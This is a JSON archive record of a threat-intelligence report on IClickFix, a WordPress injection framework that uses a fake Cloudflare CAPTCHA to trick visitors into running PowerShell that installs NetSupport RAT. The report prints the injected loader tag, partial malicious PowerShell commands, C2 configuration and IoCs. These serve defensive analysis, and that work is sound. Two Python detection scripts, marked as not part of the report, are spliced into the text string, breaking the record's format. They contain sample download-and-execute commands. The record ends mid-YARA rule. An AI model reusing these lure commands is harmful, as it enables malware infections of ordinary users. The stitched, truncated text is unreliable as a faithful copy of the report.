{
	"id": "18c25e94-d4e4-4c0a-b315-8e1417053eb9",
	"created_at": "2026-04-06T00:13:48.823665Z",
	"updated_at": "2026-04-10T13:13:06.225647Z",
	"deleted_at": null,
	"sha1_hash": "29e31357ae811beabbe597ff82092503a5a73c3e",
	"title": "Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2667145,
	"plain_text": "Meet IClickFix: a widespread WordPress-targeting framework using the\r\nClickFix tactic\r\nBy Quentin Bourgue,\u0026nbsp;Amaury G.\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2026-01-29 · Archived: 2026-04-05 18:31:21 UTC\r\nThis post was originally distributed as a private FLINT report to our customers on 6 January 2026.\r\nTable of contents\r\nIntroduction\r\nThreat hunting of emerging adversary clusters\r\nTracking ClickFix clusters in the wild\r\nFrom compromised WordPress to infected system\r\nIClickFix delivery stages\r\nNetSupport RAT infection\r\nIClickFix’s spread in the wild\r\nCompromised WordPress worldwide\r\nHistorical data\r\nConclusion\r\nIoCs \u0026 Technical details\r\nIoCs\r\nYARA rules\r\nExternal references\r\nIntroduction\r\nIn November 2025, during our threat hunting routine for unveiling emerging adversary clusters, TDR analysts identified a\r\nwidespread malware distribution campaign leveraging the ClickFix social engineering tactic through a Traffic\r\nDistribution System (TDS).\r\nThis cluster uses a malicious JavaScript framework injected into compromised WordPress sites to display the ClickFix lure\r\nand deliver NetSupport RAT. Because the initial JavaScript includes the distinctive HTML tag ic-tracker-js , we named\r\nthe malicious framework “IClickFix”.\r\nHistorical analysis of IClickFix reveals that this cluster has been active since at least December 2024, compromising over\r\n3,800 WordPress sites. As reported by the Walmart Global Tech security team1, this cluster uses a Traffic Distribution\r\nSystem (TDS) to redirect selected visitors and deliver the next-stage payload, enhancing IClickFix’s stealth.\r\nTDR analysts first encountered this ClickFix cluster in February 2025, when it was in its early stages. We observed it\r\ndistributing Emmenhtal Loader, which ultimately downloaded XFiles Stealer. 
At that time, IClickFix had not yet reached sufficient scale to warrant an in-depth analysis.\r\nLike the ClearFake threat [2], IClickFix employs a multi-stage JavaScript loader that presents a fake Cloudflare Turnstile CAPTCHA challenge using the ClickFix social engineering tactic. The ClickFix command, once pasted and run by the victim, launches PowerShell, which downloads and executes an obfuscated PowerShell script that ultimately drops NetSupport RAT.\r\nhttps://blog.sekoia.io/meet-iclickfix-a-widespread-wordpress-targeting-framework-using-the-clickfix-tactic/\r\nPage 1 of 19\r\nThis report provides a technical analysis of the persistent IClickFix framework, the adversary’s infrastructure, and its technical evolution throughout 2025.\r\nThreat hunting of emerging adversary clusters\r\nIn November 2025, we unveiled the IClickFix framework and its associated infrastructure using two distinct threat hunting methodologies:\r\nAn internal tool designed to detect watering hole attacks across thousands of monitored websites belonging to strategic organisations in government, defense, energy, telecom, and other verticals.\r\nGeneric YARA rules deployed on scanning platforms to detect pages employing the ClickFix social engineering tactic.\r\nExposing watering hole attacks\r\nIn late 2025, Sekoia TDR analysts deployed a new capability for detecting watering hole attacks.\r\nA watering hole attack is a strategic attack in which operators compromise a legitimate website known to be frequented by a specific target group, effectively ambushing users who visit the trusted source. This tactic is often leveraged by state-sponsored actors to conduct espionage against specific sectors (such as defense or finance) by targeting a distinct community of interest, but it also serves as a potent vector for broader cybercrime operations.\r\nWhen our monitoring began in November, the WordPress website of the Ghanaian Allied Health Professions Council, ahpc.gov[.]gh, was flagged because its main page included a malicious JavaScript snippet that loads the URL hxxps://ototaikfffkf[.]com/fffa.js, a domain registered a few months earlier.\r\nFigure 1. Screenshot of the Ghanaian Allied Health Professions Council compromised website\r\nAlthough the initial indicators suggested a targeted watering hole, we quickly observed the same JavaScript snippet across multiple unrelated websites spanning different sectors and countries. This pattern indicates mass distribution rather than a targeted approach against the government of Ghana.\r\nTracking ClickFix clusters in the wild\r\nSekoia TDR analysts actively track pages that implement the ClickFix social engineering tactic, given its widespread adoption by cybercriminals and nation-state-sponsored threat groups. In particular, we have developed generic YARA rules that detect ClickFix pages using keywords, resource patterns, and JavaScript functions.\r\nBy November 2025, while analysing detection results from the urlquery scanning service [3], one of these rules had triggered alerts for resources retrieved from multiple scanned URLs. 
The detected resources consisted of HTML pages served by the malicious framework and containing ClickFix-related strings, including:\r\nVerify you are human\r\nplease follow these steps\r\n\u003cb\u003eCtrl + V\u003c/b\u003e\r\n\u003cb\u003eWin + R\u003c/b\u003e\r\nPress \u003cb\u003eEnter\u003c/b\u003e\r\nnavigator.clipboard.writeText(\r\nAs shown in the following figure, the website scanned on urlquery contacted several domains and fetched resources matching our phishing_clickfix_generic_9 YARA rule.\r\nFigure 2. ClickFix alerts generated for a website compromised by IClickFix, from the urlquery scanning service\r\nAfter our threat hunting tools and the Sekoia SOC platform’s telemetry flagged multiple malicious domains, and given that our initial February 2025 observation confirmed a persistent and widespread threat, we conducted an in-depth analysis of the ClickFix cluster.\r\nFrom compromised WordPress to infected system\r\nAs of 9 December 2025, the stages of the observed infection chain were as follows [4]:\r\nFigure 3. Overview of the IClickFix framework infection chain\r\nFrom the user’s perspective, the sequence is:\r\nUpon accessing the compromised website, the legitimate HTML content initially loads as expected.\r\nWithin seconds, however, the entire page is replaced by a fake CAPTCHA challenge designed to mimic Cloudflare Turnstile.\r\nWhen the user attempts to resolve the challenge, they are instructed to copy and execute a specific command to complete the verification.\r\nThis command conceals malicious code that differs from the displayed instructions, ultimately resulting in the execution and deployment of NetSupport RAT.\r\nIClickFix delivery stages\r\nWordPress sites compromised by the IClickFix framework\r\nThe IClickFix operator compromised WordPress sites, which act as watering holes, to inject the following malicious JavaScript code into their HTML pages:\r\n...\r\n\u003cscript type=\"text/javascript\" src=\"hxxps://ksfldfklskdmbxcvb[.]com/gigi?ts=1765169670\" id=\"ic-tracker-js\" defer=\"defer\" d\r\n...\r\nCode 1 – IClickFix JavaScript injected into compromised WordPress sites\r\nThis initial snippet injected into legitimate pages serves two purposes:\r\nPrefetch the attacker’s domain ksfldfklskdmbxcvb[.]com before requesting the resource, using a dns-prefetch resource hint.\r\nLoad an external JavaScript file from the attacker’s domain.\r\nThe external URL redirects, via the Location HTTP header, to a second URL hosting the next-stage JavaScript: hxxps://ksdkgsdkgkgmgm[.]pro/ofofo.js. Unwanted traffic is instead redirected via an HTTP 301 to hxxps://ksfldfklskdmbxcvb[.]com/-, which fails to load. Notably, the HTTP responses include the header x-robots-tag: noindex.\r\nWe assess with high confidence that the attacker abuses the open-source URL shortener YOURLS [5] as a Traffic Distribution System (TDS). 
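The hunting checks this stage suggests, written out as an added Python example; this is not code from the report or from Sekoia, and the host names (stage1.invalid, stage2.invalid, stage3.invalid), the sample page, the sample HTTP responses and the sample script are constructed for the demonstration. It extracts the injected stage-1 loader tag and its dns-prefetch hint from a page, labels a stage-1 HTTP response as the YOURLS-style sink for unwanted traffic or as the hand-off to the next-stage script, and recovers https URLs that an obfuscated payload stores base64-encoded (the same aHR0cH prefix the YARA rules below key on):

```python
# Added example for the IClickFix stage-1 artefacts described above; not
# code from the Sekoia report. Hosts, sample HTML, headers and JS below are
# constructed for the demonstration.
import base64
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit


class _InjectedTagFinder(HTMLParser):
    '''Collect <script id=\"ic-tracker-js\"> sources and dns-prefetch hints.'''

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.prefetch = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == 'script' and a.get('id') == 'ic-tracker-js' and a.get('src'):
            self.scripts.append(a['src'])
        if tag == 'link' and (a.get('rel') or '').lower() == 'dns-prefetch' and a.get('href'):
            self.prefetch.append(a['href'])


def find_iclickfix_injection(html):
    '''Return details of the injected loader tag, or None if the page is clean.'''
    p = _InjectedTagFinder()
    p.feed(html)
    if not p.scripts:
        return None
    src = p.scripts[0]
    u = urlsplit(src)
    prefetched = {urlsplit(h).hostname or h.strip('/') for h in p.prefetch}
    return {
        'src': src,
        'host': u.host if False else u.hostname,
        'ts': (parse_qs(u.query).get('ts') or [None])[0],   # cache-busting timestamp
        'prefetched': u.hostname in prefetched,             # dns-prefetch names the same host
    }


def classify_redirect(status, headers):
    '''Label a stage-1 response: YOURLS sends unwanted visitors to /- with
    x-robots-tag: noindex, and selected visitors on to the next-stage .js.'''
    h = {k.lower(): v for k, v in headers.items()}
    path = urlsplit(h.get('location', '')).path
    if status == 301 and path == '/-' and 'noindex' in h.get('x-robots-tag', '').lower():
        return 'yourls_sink'
    if status in (301, 302, 307, 308) and path.endswith('.js'):
        return 'payload_handoff'
    return 'other'


_B64_HTTPS = re.compile(r'aHR0cH[A-Za-z0-9+/=]{8,}')   # base64 of an https URL


def decode_embedded_urls(js):
    '''Recover base64-encoded https URLs from an obfuscated script. Strings the
    obfuscator has sliced into pieces are not reassembled here.'''
    found = []
    for m in _B64_HTTPS.finditer(js):
        blob = m.group(0)
        blob += '=' * (-len(blob) % 4)          # restore stripped padding
        try:
            text = base64.b64decode(blob).decode('utf-8', 'replace')
        except ValueError:
            continue
        if text.startswith('https://'):
            found.append(text)
    return found


# Constructed samples (the hosts are reserved .invalid names, not real IoCs).
SAMPLE_HTML = '''<html><head>
<link rel=\"dns-prefetch\" href=\"//stage1.invalid\">
<script type=\"text/javascript\" src=\"https://stage1.invalid/gigi?ts=1765169670\" id=\"ic-tracker-js\" defer=\"defer\"></script>
</head><body>legitimate WordPress content</body></html>'''
SINK_RESPONSE = (301, {'Location': 'https://stage1.invalid/-', 'X-Robots-Tag': 'noindex'})
HANDOFF_RESPONSE = (301, {'Location': 'https://stage2.invalid/ofofo.js', 'X-Robots-Tag': 'noindex'})
EMBEDDED_URL = 'https://stage3.invalid/liner.php?data='
SAMPLE_JS = 'var _0x1a=atob(' + repr(base64.b64encode(EMBEDDED_URL.encode()).decode()) + ');'

if __name__ == '__main__':
    print(find_iclickfix_injection(SAMPLE_HTML))
    print(classify_redirect(*SINK_RESPONSE), classify_redirect(*HANDOFF_RESPONSE))
    print(decode_embedded_urls(SAMPLE_JS))
```

The redirect classifier needs only the status line and headers, so it can run over proxy logs or a urlscan/urlquery export without fetching the attacker URL; fetching it live would itself count as a visit to the TDS and burn the indicator.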
Two observations support this assessment: the domain hosts a YOURLS administration panel at /admin/ [6], and the redirection behaviour (HTTP 301, redirect to /-, x-robots-tag header) matches YOURLS’s PHP redirect function [7].\r\nThese redirection steps enable the attacker to filter visitors by device characteristics and to protect the infrastructure from bots, scanners, and other unwanted traffic. To our knowledge, this is the first time that Sekoia analysts have observed YOURLS being abused as a TDS by cybercriminals.\r\nJavaScript payloads\r\nThe first payload, fetched from hxxps://ksdkgsdkgkgmgm[.]pro/ofofo.js, is an obfuscated JavaScript file that:\r\nExfiltrates fingerprint data, the compromised site’s domain and the timestamp to a URL that is stored base64-encoded in the script, using the pattern:\r\n.php?data={\"host\": \u003cCOMPROMISED_WORDPRESS\u003e,\"now\": \u003cUNIX_TIMESTAMP\u003e}\r\nLoads a second JavaScript file from hxxps://booksbypatriciaschultz[.]com/liner.php.\r\nFigure 4. First JavaScript fetched by WordPress sites compromised by the IClickFix framework\r\nThe second payload, loaded from hxxps://booksbypatriciaschultz[.]com/liner.php, is a JavaScript file that:\r\nLoads an HTML page containing the ClickFix lure and the JavaScript for the fake CAPTCHA interactions.\r\nFetches the compromised WordPress site’s favicon.\r\nListens for the event sync_event_click in the loaded HTML and exfiltrates fingerprint data to the same server using the pattern:\r\n.php?click=1\u0026data={\"host\": \u003cCOMPROMISED_DOMAIN\u003e,\"now\": \u003cUNIX_TIMESTAMP\u003e}\r\nOf note, the attacker uses another compromised WordPress site (booksbypatriciaschultz[.]com) to host the PHP side of this part of the IClickFix framework.\r\nClickFix lure\r\nAfter the JavaScript loads the ClickFix lure, it replaces the original WordPress page with the following webpage.\r\nIf the user clicks the CAPTCHA button, an alert appears stating “Unusual Web Traffic Detected”, followed by instructions to verify that the activity originates from a legitimate user. At the same time, the ClickFix command is copied to the user’s clipboard.\r\nFigure 5. ClickFix lure impersonating Cloudflare Turnstile used by the IClickFix framework\r\nThis widespread social engineering tactic, known as ClickFix, is designed to convince users to run a malicious command on their Windows host (here through the Win + R Run dialog), thereby compromising their system.\r\nInterestingly, this ClickFix lure, which impersonates the Cloudflare CAPTCHA and fakes “unusual traffic”, closely resembles the lure deployed by the ClearFake framework in early 2025, as detailed in our March 2025 report. The page’s source code (CSS, JavaScript, HTML) is nearly identical to ClearFake’s. It appears the operator borrowed the ClearFake lure while developing the IClickFix framework. 
Because IClickFix is less sophisticated than ClearFake, we assess with high confidence that two different cybercriminals developed and operated these malware distribution frameworks.\r\nNetSupport RAT infection\r\nAs of early December 2025, the ClickFix command distributed by the IClickFix cluster was:\r\npowershell -w hidden -nop -c \"$v='8db6.ps1';$q=Join-Path $env:ProgramData 'e';$p=Join-Path $q $v;md $q -ea 0|out-null;iwr\r\nThis command downloads a PowerShell script disguised as a JSON file and executes it while bypassing the execution policy.\r\nThe script (SHA256: 05b03a25e10535c5c8e2327ee800ff5894f5dbfaf72e3fdcd9901def6f072c6d) is a large PowerShell script embedding multiple files, all obfuscated via base64 encoding and string slicing. The PowerShell loader’s main operations are to:\r\nCreate a marker file in TEMP to prevent re-running for 72 hours, then self-delete the script.\r\nCreate the directory ProgramData\\S1kCMNfZi3\\ and write 15 files into it by joining and base64-decoding the obfuscated strings.\r\nEstablish persistence via the Windows Run registry key, pointing to the executable client32.exe.\r\nLaunch client32.exe via explorer.exe.\r\nClear the RunMRU (most recently used) command history to remove traces of the ClickFix command, then self-remove.\r\nOf note, this PowerShell script masquerades as a legitimate installer for “SecureModule Engine v1.0.0”, complete with installation messages and a progress bar.\r\nThis PowerShell loader serves as a dropper for NetSupport RAT, providing persistence, obfuscation, and indicator-removal capabilities. 
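A host-side counterpart, added here as an example and not taken from the report: a scoring heuristic over process-creation events that picks out the ClickFix PowerShell pattern common to the December 2025 command above (hidden window, -nop, iwr into %ProgramData%) and the February 2025 variant quoted under Historical data (cmd /c start /min wrapper, Invoke-RestMethod into the Public user directory), plus a check for the RunMRU wipe the loader performs. The weights, the alert threshold, the stage.invalid URLs and the sample command lines are constructions of the author; the samples follow the shape of the commands quoted on this page but are not the original strings.

```python
# Added example for the ClickFix -> NetSupport chain described above; not code
# from the Sekoia report. Weights, threshold and samples are constructed.
BS = chr(92)   # a backslash, built with chr() so the snippet needs no escapes

HIDDEN_WINDOW = ('-w hidden', '-win hidden', '-windowstyle hidden')
NO_PROFILE = ('-nop', '-noprofile')
DOWNLOAD_CMDLETS = ('iwr ', 'invoke-webrequest', 'irm ', 'invoke-restmethod',
                    'downloadstring', 'downloadfile', 'start-bitstransfer')
POLICY_BYPASS = ('-ep bypass', '-exec bypass', '-executionpolicy bypass')
DROP_DIRS = ('$env:programdata', 'programdata/', '$env:public', 'users/public',
             '$env:temp', 'appdata/local/temp')
ALERT_THRESHOLD = 4   # one or two generic flags alone must not fire


def _normalise(text):
    '''Lower-case and fold backslashes (single or PowerShell-doubled) to one
    forward slash so the path needles match either spelling.'''
    t = text.lower().replace(BS, '/')
    while '//' in t:
        t = t.replace('//', '/')
    return t


def score_clickfix_command(command_line, parent_image=''):
    '''Score one process-creation event; returns (score, list of hit names).'''
    cl = _normalise(command_line)
    hits = []
    if 'powershell' not in cl and 'pwsh' not in cl:
        return 0, hits
    checks = (
        ('hidden_window', HIDDEN_WINDOW, 1),
        ('no_profile', NO_PROFILE, 1),
        ('download_cmdlet', DOWNLOAD_CMDLETS, 2),
        ('policy_bypass', POLICY_BYPASS, 1),
        ('drop_to_user_writable_dir', DROP_DIRS, 1),
        ('start_min_wrapper', ('start /min',), 1),
    )
    score = 0
    for name, needles, weight in checks:
        if any(n in cl for n in needles):
            hits.append(name)
            score += weight
    # A command pasted into the Win+R dialog runs as a child of explorer.exe
    if _normalise(parent_image).rsplit('/', 1)[-1] == 'explorer.exe':
        hits.append('parent_explorer')
        score += 1
    return score, hits


def is_clickfix_candidate(command_line, parent_image=''):
    return score_clickfix_command(command_line, parent_image)[0] >= ALERT_THRESHOLD


def is_runmru_wipe(registry_event):
    '''True for a deletion under HKCU ... Explorer/RunMRU, the Run-dialog history
    the loader clears to hide the pasted command (field names assumed here).'''
    key = _normalise(registry_event.get('key', ''))
    return (registry_event.get('op') in ('delete_key', 'delete_value')
            and key.endswith('/explorer/runmru'))


def winpath(*parts):
    return BS.join(parts)


# Constructed samples shaped like the two commands quoted in the report
# (stage.invalid, a1b2.ps1 and the trailing steps are invented).
DEC_2025_STYLE = '''powershell -w hidden -nop -c \"$v='a1b2.ps1';$q=Join-Path $env:ProgramData 'e';$p=Join-Path $q $v;md $q -ea 0|out-null;iwr https://stage.invalid/a1b2.json -OutFile $p;powershell -ep bypass -f $p\"'''
FEB_2025_STYLE = ('cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='
                  + repr(winpath('c:', 'users', 'public', '3aw.msi'))
                  + '; Invoke-RestMethod https://stage.invalid/3aw -OutFile $path; msiexec /i $path /qn')
BENIGN = [
    ('powershell -NoProfile -Command Get-Process | Sort-Object CPU -Descending',
     'C:/Windows/System32/cmd.exe'),
    ('powershell -ExecutionPolicy Bypass -File C:/scripts/nightly-backup.ps1',
     'C:/Windows/System32/svchost.exe'),
]
RUNMRU_WIPE = {'op': 'delete_value', 'value': 'MRUList',
               'key': winpath('HKCU', 'Software', 'Microsoft', 'Windows',
                              'CurrentVersion', 'Explorer', 'RunMRU')}

if __name__ == '__main__':
    for cmd, parent in [(DEC_2025_STYLE, 'C:/Windows/explorer.exe'), (FEB_2025_STYLE, '')] + BENIGN:
        print(score_clickfix_command(cmd, parent), is_clickfix_candidate(cmd, parent))
    print(is_runmru_wipe(RUNMRU_WIPE))
```

On real telemetry the command line comes from Sysmon event 1 or Windows 4688 with command-line auditing enabled; without that audit setting the PowerShell flags are invisible and the heuristic degrades to the parent-process signal alone, which is why the RunMRU deletion is worth alerting on separately.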
The written files are components of the NetSupport RAT deployment; 14 of the 15 are listed below with their hashes (Filename | Role | SHA256):\r\nAudioCapture.dll | NetSupport audio capturing library | 2cc8ebea55c06981625397b04575ed0eaad9bb9f9dc896355c011a62febe49b5\r\nclient32.exe | NetSupport client executable | 06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268\r\nclient32.ini | NetSupport client configuration file | 62f7a444ab0c645f20c7dc6340c3eaaad7ef033b2188c3e5123406762990c517\r\ngggg.txt | Unknown | 6846bc236bd2095fbf93f8b31dd4ca0798614fcab20fbd2ecac6cc7f431c6dec\r\nHTCTL32.DLL | NetSupport HTTP communication library | 6562585009f15155eea9a489e474cebc4dd2a01a26d846fdd1b93fdc24b0c269\r\nmsvcr100.dll | Microsoft C++ runtime library | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18\r\nnskbfltr.inf | NetSupport keyboard filter | d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368\r\nNSM.ini | NetSupport configuration file | e0ed36c897eaa5352fab181c20020b60df4c58986193d6aaf5bf3e3ecdc4c05d\r\nNSM.LIC | NetSupport licence file | 83a6feb6304effcd258129e5d46f484e4c34c1cce1ea0c32a94a89283ccd24f9\r\nnsm_vpro.ini | NetSupport vPro configuration file | 4bfa4c00414660ba44bddde5216a7f28aeccaa9e2d42df4bbff66db57c60522b\r\npcicapi.dll | NetSupport communication library | 2dfdc169dfc27462adc98dde39306de8d0526dcf4577a1a486c2eef447300689\r\nPCICHEK.DLL | NetSupport system check library | 0cff893b1e7716d09fb74b7a0313b78a09f3f48c586d31fc5f830bd72ce8331f\r\nPCICL32.DLL | NetSupport core dependency library | b6d4ad0231941e0637485ac5833e0fdc75db35289b54e70f3858b70d36d04c80\r\nremcmdstub.exe | NetSupport remote command prompt stub | b11380f81b0a704e8c7e84e8a37885f5879d12fbece311813a41992b3e9787f2\r\nNetSupport C2 domains are configured in client32.ini as follows:\r\nGatewayAddress=pusykakimao[.]com:443\r\nPort=443\r\nSecondaryGateway=fnotusykakimao[.]com:443\r\nSecondaryPort=443\r\nThe malware communicates with its C2 servers on the endpoint /fakeurl.htm.\r\nThe licence file lists KAKAN as the licensee and NSM789508 as the serial number, identifiers previously seen in other ClickFix campaigns such as EVALUSION, documented by eSentire [8].\r\nNetSupport RAT is a legitimate, commercially available remote administration tool frequently abused by cybercriminals. It grants attackers full control of the infected host, including screen and audio monitoring, keystroke logging, command execution, persistence, and file transfers.\r\nIClickFix’s spread in the wild\r\nCompromised WordPress worldwide\r\nBy pivoting on specific code patterns observed within the redirection chain and leveraging server indexing services, we identified a cluster of over 3,800 compromised WordPress sites involved in this campaign. We performed a demographic analysis of these compromised sites, categorising them by geography (based on TLD and domain linguistics) and industry vertical.\r\nFigure 6. Statistics on geographical and industry distribution of WordPress sites compromised by the IClickFix framework\r\nOur analysis reveals a global footprint spanning 82 distinct countries. While the United States accounts for the plurality of infections, the wide geographic dispersion suggests no targeted regional effort. Similarly, the distribution across industry verticals does not reflect a concerted effort to target specific sectors. 
Consequently, we assess that this campaign relies on opportunistic mass exploitation rather than strategic targeting.\r\nThe compromised websites likely resulted from the exploitation of a vulnerability within the WordPress core or a widely deployed third-party plugin, or from the use of administrative credentials harvested via infostealers or phishing campaigns.\r\nFingerprinting conducted on 18 December 2025 revealed that the majority of infected sites run current or near-current WordPress versions, specifically 6.9 (released on 2 December 2025) and 6.8.3 (released on 30 September 2025), together with up-to-date versions of the Elementor [9], WooCommerce [10], and Gravity Forms [11] plugins. Because the fingerprinting took place after the compromise, a current version does not exclude exploitation of a vulnerability that was patched in the meantime. At the time of writing, the initial access vector has not been identified.\r\nHistorical data\r\nIn February 2025, while investigating Emmenhtal Loader, TDR analysts discovered an early version of what we later named the IClickFix cluster, which was already distributed via compromised WordPress sites and a Cloudflare Turnstile lure.\r\nThe ClickFix command copied into the user’s clipboard downloaded an MSI file, a sample of Emmenhtal Loader, that ultimately downloaded and executed XFiles Stealer.\r\nAt that stage, the IClickFix cluster was in its first months of development and had compromised just 160 WordPress sites, according to PublicWWW results for the distinctive id=\"ic-tracker-js\" attribute, which was already in use at that time.\r\nAs illustrated below, the page impersonating Cloudflare Turnstile displayed step-by-step keyboard instructions explaining how to execute the malicious command. We assess that this initial lure was less convincing than the later one, which mimics the Turnstile challenge users are accustomed to completing.\r\nFigure 7. ClickFix lure used in February 2025 on websites compromised by IClickFix\r\nIn early February 2025, the malicious code injected into compromised WordPress sites fetched JavaScript from hxxp://qq525f.short[.]gy/claud (a URL from the Short[.]gy URL shortener), which then redirected to hxxps://bestieslos[.]com/over.js. At this stage, there was no TDS protection and only a single execution step: the downloaded JavaScript contained the HTML lure, the ClickFix command, and the JavaScript that performs the clipboard operations.\r\nAs of early February 2025, the ClickFix command distributed by the IClickFix cluster was:\r\ncmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\\\\\\\users\\\\\\\\public\\\\\\\\3aw.msi'; Invoke-Res\r\nThroughout 2025, the technical evolution of IClickFix demonstrated that the operator consistently updated the framework code, lures, and payloads, and compromised additional WordPress sites to expand the cluster’s reach.\r\nConclusion\r\nThe IClickFix framework serves as a widespread and persistent initial access vector, leveraging the ClickFix social engineering tactic for malware distribution. Since emerging in late 2024, this cluster has compromised over 3,800 WordPress sites through opportunistic watering hole attacks to distribute commodity malware such as NetSupport RAT, Emmenhtal Loader and XFiles Stealer.\r\nThroughout 2025, the IClickFix operator consistently updated the malicious framework by abusing the YOURLS URL shortener as a Traffic Distribution System (TDS), introducing additional JavaScript delivery stages, refining the lure, and compromising more WordPress sites. 
These updates have strengthened, protected and expanded the IClickFix infrastructure, complicating both analysis and detection.\r\nBy leveraging the ClickFix social engineering technique and compromising WordPress sites at scale, the operator has affected numerous users worldwide. TDR assesses with moderate confidence that the IClickFix framework may be responsible for thousands of infections per day.\r\nTo protect our customers from IClickFix, Sekoia.io analysts will continue proactive monitoring of this threat and of other clusters leveraging the ClickFix social engineering tactic.\r\nIoCs \u0026 Technical details\r\nThe indicators and YARA rules listed below are available in CSV format with additional metadata in the SEKOIA-IO/Community GitHub repository.\r\nIoCs\r\nIClickFix framework\r\nStage 1: redirection domains (Domain name | Creation date)\r\ndasktiitititit[.]com | 2025-11-22\r\nksfldfklskdmbxcvb[.]com | 2025-11-22\r\nappasdmdamsdmasd[.]com | 2025-11-04\r\naasdtvcvchcvhhhhh[.]com | 2025-11-02\r\ndhdjisksnsbhssu[.]com | 2025-10-22\r\nksaitkktkatfl[.]com | 2025-10-12\r\nasdaotasktjastmnt[.]com | 2025-09-30\r\nskldfjgsldkmfgsdfg[.]com | 2025-09-16\r\njdaklsjdklajsldkjd[.]com | 2025-07-01\r\nfsdotiototakkaakkal[.]com | 2025-06-06\r\nikfsdfksldkflsktoq[.]com | 2025-05-12\r\nititoiaitoaitoiakkaka[.]com | 2025-05-03\r\ndasopdoaodoaoaoao[.]com | 2025-04-28\r\nsdfikguoriqoir.cloud | 2025-04-20\r\nototoqtklktzlk[.]com | 2025-04-08\r\npptpooalfkakktl[.]com | 2025-03-28\r\nforfsakencoilddxga[.]com | 2025-03-18\r\novertimeforus[.]com | 2025-03-14\r\ntripallmaljok[.]com | 2025-03-05\r\npqoqllalll[.]com | 2025-03-01\r\nqit15.short[.]gy | 2025-03-01\r\nqq51f.short[.]gy | 2025-02-01\r\nqq525f.short[.]gy | 2025-01-09\r\nStage 2: domains hosting JavaScript payload 1 (Domain name | Creation date)\r\nksdkgsdkgkgmgm[.]pro | 2025-12-05\r\nfsdtiototoitweot[.]com | 2025-12-05\r\nalsokdalsdkals[.]com | 2025-11-22\r\nldasldalsd[.]com | 2025-11-14\r\nfoflfalflafl[.]com | 2025-11-14\r\nototaikfffkf[.]com | 2025-11-04\r\nxxclglglglklgkxlc[.]com | 2025-11-02\r\nzmzkdodudhdbdu[.]com | 2025-10-22\r\naksdaitkatktk[.]com | 2025-10-12\r\ndasdalksdkmasdas[.]com | 2025-10-05\r\nkdkdaosdkalkdkdakd[.]com | 2025-06-20\r\ncaprofklfkzttripwith[.]com | 2025-03-18\r\nkdfmmikfkafjikmfikfjhm[.]com | 2025-03-18\r\nserviceverifcaptcho[.]com | 2025-03-12\r\nkalkgmbzfghq[.]com | 2025-03-07\r\nundermymindops[.]com | 2025-02-27\r\nbestiamos[.]com | 2025-02-16\r\nbestieslos[.]com | 2024-12-18\r\nStage 3: compromised domains hosting JavaScript payload 2 (Domain name | Creation date)\r\n1teamintl[.]com | 2025-12-16\r\nmexicaletta[.]com[.]br | 2025-12-07\r\nbooksbypatriciaschultz[.]com | 2025-11-24\r\nwww.webentangled[.]com | 2025-11-24\r\nalmhdnursing[.]qa | 2025-11-20\r\nwww.alwanqa[.]com | 2025-11-17\r\ntalentforth[.]org | 2025-11-12\r\nwintars[.]com | 2025-11-11\r\nerisaactuarialservices[.]com | 2025-11-06\r\nmedi-care[.]gr | 2025-11-05\r\nwww.raftingsella[.]com | 2025-10-30\r\njairecanoas[.]com | 2025-10-22\r\nabogados-gs[.]com | 2025-10-15\r\nwww.mitaxi[.]net | 2025-10-13\r\nstangherlini[.]com[.]br | 2025-10-05\r\necoawnings[.]com[.]au | 2025-10-03\r\ndreamdraftingsydney[.]com[.]au | 2025-09-29\r\nsolpower[.]com[.]my | 2025-09-21\r\nsfc-oman[.]com | 2025-09-16\r\ngerab[.]bt | 2025-09-11\r\nsoinpharmaceuticals[.]com | 2025-09-07\r\nNetSupport RAT\r\nRecent NetSupport RAT C2 domains used by the IClickFix campaign (Domain name | Creation date)\r\nnightlomsknies[.]com | 2025-12-01\r\nnotlimbobimboa[.]com | 2025-11-13\r\nnotmauserfizko[.]com | 2025-11-13\r\nfnotusykakimao[.]com | 2025-11-13\r\notpnemoyjfh[.]com | 2025-11-02\r\npisikakimmmad[.]com | 2025-11-02\r\nmakimakiokina[.]com | 2025-11-02\r\nsmallfootmyfor[.]com | 2025-10-03\r\nunderstandott[.]com | 2025-09-26\r\nadventurergsdfjg[.]com | 2025-09-26\r\nremarkableaskf[.]com | 2025-09-26\r\nfoundationasdasd[.]com | 2025-09-26\r\ngenerationkasdm[.]com | 2025-09-26\r\nuniversitynsd[.]com | 2025-09-26\r\nbasketballast[.]com | 2025-09-26\r\nblueprintsfdskjhfd[.]com | 2025-09-26\r\nvoluntarydasd[.]com | 2025-09-26\r\natmospheredast[.]com | 2025-09-26\r\nnewgenlosehops[.]com | 2025-08-05\r\nlastmychancetoss[.]com | 2025-08-05\r\nlosiposithankyou[.]com | 2025-07-01\r\nNetSupport RAT C2 IP addresses and URLs used by the IClickFix campaign (Indicator | First seen | Last seen)\r\n85.208.84[.]35 | 2025-10-09 | –\r\nhttp://85.208.84[.]35:443/fakeurl.htm | 2025-10-09 | –\r\n141.98.11[.]175 | 2025-08-16 | 2025-09-10\r\nhttp://141.98.11[.]175/fakeurl.htm | 2025-08-16 | 2025-09-10\r\n83.222.190[.]174 | 2025-05-10 | 2025-07-04\r\nhttp://83.222.190[.]174:443/fakeurl.html | 2025-05-10 | 2025-07-04\r\nNetSupport RAT files used by the IClickFix campaign: the 14 files and SHA256 hashes listed in the NetSupport RAT infection section above.\r\nYARA rules\r\nCompromised legitimate WordPress websites injected by the IClickFix framework:\r\nrule infrastructure_iclickfix_cluster_ic_tracker_js_wordpress {\r\n    meta:\r\n        description = \"Find WordPress HTML compromised by the IClickFix cluster, that injects the ic-tracker-js HTML tag\"\r\n        source = \"Sekoia.io\"\r\n        creation_date = \"2025-12-04\"\r\n        modification_date = \"2025-12-04\"\r\n        classification = \"TLP:CLEAR\"\r\n    strings:\r\n        $wp01 = \"\\\" 